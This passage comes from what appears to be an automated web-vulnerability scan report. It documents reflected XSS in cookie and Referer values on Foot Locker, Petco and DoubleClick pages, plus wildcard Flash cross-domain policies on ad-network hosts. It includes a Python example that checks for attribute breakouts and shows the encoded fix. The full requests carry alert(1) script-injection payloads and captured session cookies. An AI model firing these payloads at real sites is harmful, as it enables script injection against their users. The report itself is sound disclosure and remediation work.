Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; mt.v=1.1817838745.1305510198897; s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.1.10.1305510217
Referer: http://www.google.com/search?hl=en&q=6bd5a"><script>alert(1)</script>3de0fcd614

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:42 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 114272


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<IFRAME src="https://fls.doubleclick.net/activityi;src=1877163;type=homep742;cat=homep168;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=6bd5a"><script>alert(1)</script>3de0fcd614;u6=;u7=;ord=1;num=38799404?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...
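Finding 5.69 (UniqueItemId in a breadcrumb href) and findings 5.72 to 5.74 (Referer in the Floodlight IFRAME src) share one context: a value inside a URL inside a double-quoted attribute; the TID cookie finding that follows sits in the same context. The following is an added example for this report, not code from the scanner or from the sites tested. It rebuilds both tags with the captured payloads, applies the two encoding steps (URL-encode the value, then attribute-encode the URL), and uses html.parser to detect an attribute-boundary breakout independently of whether the payload's CSS expression would run in a given browser. The render function names and the tag templates are assumptions modelled on the response snippets.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Payloads as they appear in findings 5.69 and 5.72.
ITEM_ID_PAYLOAD = '46497b89"style="x:expression(alert(1))"588742d80ce'
REFERER_PAYLOAD = 'http://www.google.com/search?hl=en&q=24cbd"><script>alert(1)</script>8eeef5c5ccb'

PRODUCT_URL = "http://www.redcrossstore.org/Shopper/Product.aspx?UniqueItemId="
FLOODLIGHT_PREFIX = ("http://fls.doubleclick.net/activityi;src=1715989;type=categ519;"
                     "cat=lawng319;u1=;u2=2;u3=;u4=2568444;u5=")
FLOODLIGHT_SUFFIX = ";ord=1;num=96780812?"


def breadcrumb_link_vulnerable(item_id: str) -> str:
    # Pattern from 5.69: raw parameter value concatenated into the href.
    return f'<a href="{PRODUCT_URL}{item_id}" class="breadcrumbs">'


def breadcrumb_link_hardened(item_id: str) -> str:
    url = PRODUCT_URL + quote(item_id, safe="")          # step 1: encode for the URL query
    return f'<a href="{html.escape(url, quote=True)}" class="breadcrumbs">'  # step 2: encode for the attribute


def floodlight_iframe_vulnerable(referer: str) -> str:
    # Pattern from 5.72 to 5.74: Referer header spliced into the u5 key of the iframe URL.
    return (f'<IFRAME SRC="{FLOODLIGHT_PREFIX}{referer}{FLOODLIGHT_SUFFIX}" '
            f'WIDTH=1 HEIGHT=1 FRAMEBORDER=0>')


def floodlight_iframe_hardened(referer: str) -> str:
    url = FLOODLIGHT_PREFIX + quote(referer, safe="") + FLOODLIGHT_SUFFIX
    return f'<IFRAME SRC="{html.escape(url, quote=True)}" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>'


class TagRecorder(HTMLParser):
    """Records every start tag with its attribute names, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str) -> list[tuple[str, dict]]:
    parser = TagRecorder()
    parser.feed(markup)
    parser.close()
    return parser.tags


def attribute_breakout(markup: str, expected_attrs: set[str]) -> bool:
    """True when the tokenizer yields an attribute the template did not emit,
    or more than the one tag the template emits (the tag was closed and a new
    one opened). Payload-agnostic: it flags the boundary, not alert(1)."""
    tags = parse_tags(markup)
    if len(tags) != 1:
        return True
    return not set(tags[0][1]) <= expected_attrs


if __name__ == "__main__":
    print("5.69 vulnerable:", parse_tags(breadcrumb_link_vulnerable(ITEM_ID_PAYLOAD)))
    print("5.69 hardened:  ", parse_tags(breadcrumb_link_hardened(ITEM_ID_PAYLOAD)))
    print("5.72 vulnerable:", [t for t, _ in parse_tags(floodlight_iframe_vulnerable(REFERER_PAYLOAD))])
    print("5.72 hardened:  ", [t for t, _ in parse_tags(floodlight_iframe_hardened(REFERER_PAYLOAD))])
```

For 5.69 the vulnerable rendering yields a single anchor whose attribute set now contains style, which is the breakout the scanner reported; for 5.72 the vulnerable rendering yields two tags, iframe and script. Both hardened renderings parse to exactly one tag with only the template's attributes, and the original values survive intact as percent-encoded parameters.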

5.75. http://www.footlocker.com/login/login_form.cfm [TID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The value of the TID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d25d0"><script>alert(1)</script>eb65c43451a was submitted in the TID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /login/login_form.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0d25d0"><script>alert(1)</script>eb65c43451a

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:58:54 GMT
Connection: close
Set-Cookie: SSLC=web%2D06;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:58:54 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0d25d0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeb65c43451a;expires=Sun, 14-Aug-2011 10:58:54 GMT;path=/
Content-Length: 3661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form name="gotoRegistration" id="frmGotoRegistration" action="https://www.footlocker.com/account/default.cfm?TID=5555-37151120432137200525561-0d25d0"><script>alert(1)</script>eb65c43451a&action=accountCreate" METHOD="POST" TARGET="_parent">
...[SNIP]...

5.76. http://www.petco.com/ [ResonanceSegment cookie]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.petco.com
Path:   /

Issue detail

The value of the ResonanceSegment cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 61c9e(a)c8b8ba6952f was submitted in the ResonanceSegment cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=261c9e(a)c8b8ba6952f; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/default.aspx?aid=10413444&pid=2537521&cm_mmc=cj-_-cid-_-2537521-_-10413444
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: Compiled
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:57:37 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:57:37 PM; domain=.petco.com; expires=Sun, 14-Aug-2011 01:57:37 GMT; path=/
Set-Cookie: Basket=AffiliateCJExpiryDate=6/19/2011 6:57:37 PM&PID=2537521&AID=10413444; domain=.petco.com; expires=Tue, 16-Aug-2011 01:57:37 GMT; path=/
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 97358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<script type='text/javascript'>var certonaSegment = 261c9e(a)c8b8ba6952f;var resx = new Object();resx.appid='petco01';resx.top1=33333;resx.top2=66666;resx.top3=100000;resx.lkmatch=/product\/\d+|sku%3D\d+/i;resx.rrelem='home_rr';resx.customerid='256672559073194';</script>
...[SNIP]...

6. Flash cross-domain policy
There are 87 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://9d060c.r.axf8.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://9d060c.r.axf8.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 9d060c.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:22 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.2. http://a.netmng.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:04 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.3. http://a.rfihub.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 199

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.4. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.5. http://action.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Set-Cookie: uuid=b8c3cf57-3d33-43ae-957f-69f246813443; path=/; expires=Thu, 15-May-2014 01:55:06 GMT; domain=.mathtag.com
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Mon, 16 May 2011 01:55:06 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.6. http://action.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 16 May 2011 01:55:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.7. http://ad.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:01:33 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.8. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 16 May 2011 01:53:56 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.9. http://ads.traderonline.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.traderonline.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:11:18 GMT
ETag: "c6acd-d0-46e5f933c6580"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.10. http://ads.undertone.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "4cd8005-fc-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 252
Content-Type: text/xml
Date: Mon, 16 May 2011 02:00:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.11. http://adserver.veruta.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.veruta.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 16 May 2011 01:58:38 GMT
Content-Type: text/xml
Content-Length: 211
Last-Modified: Sat, 24 Oct 2009 00:35:22 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-doma
...[SNIP]...

6.12. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Mon, 16 May 2011 02:00:28 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.13. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 01:55:23 GMT
Date: Mon, 16 May 2011 01:55:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.14. http://beacon.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:36:36 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.15. http://bp.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 16 May 2011 01:54:10 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

